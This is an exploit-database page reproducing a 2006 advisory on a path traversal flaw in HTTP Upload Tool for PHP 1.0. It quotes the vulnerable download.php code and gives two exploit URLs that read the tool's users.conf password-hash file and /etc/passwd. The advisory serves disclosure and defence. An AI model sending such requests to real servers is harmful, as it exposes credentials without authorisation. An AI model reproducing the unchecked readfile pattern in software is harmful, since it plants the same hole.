Lucene search
+L

HTTP Upload Tool - 'download.php' Information Disclosure

🗓️ 16 Nov 2006 00:00:00Reported by Craig HeffnerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

HTTP Upload Tool 'download.php' Information Disclosur

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-7134
6 Mar 200701:00
cve
cvelist
Cvelist
CVE-2006-7134
6 Mar 200701:00
cvelist
euvd
EUVD
EUVD-2006-7116
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-7134
6 Mar 200701:19
nvd
#######################################################################################
# Target:
#
#       HTTP Upload Tool For PHP 1.0
#       http://uploadtool.sourceforge.net/
#
# Vulnerability:
#
#       Information disclosure
#
# Description:
#
#       The download.php file in Upload Tool for PHP neither verifies that a
#       requestor has authenticated, nor performs any sanity checking on the file
#       being requested. This allows an unauthenticated user to download any file
#       which the web server has read rights to, including the users.conf file which
#       contains a list of Upload Tool's users and their hashed passwords.
#
# Vulnerable Code (truncated):
#
#       $filename = $_GET['filename'];
#       readfile("$filename");
#
# Exploit:
#
#       http://www.examplesite.com/upload/bin/download.php?filename=../conf/users.conf
#       http://www.examplesite.com/upload/bin/download.php?filename=/etc/passwd
#
# Discovered:
#
#       Craig Heffner
#       heffnercj [at] gmail.com
#       http://www.craigheffner.com
#######################################################################################

# milw0rm.com [2006-11-16]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 210
EPSS0.03412
29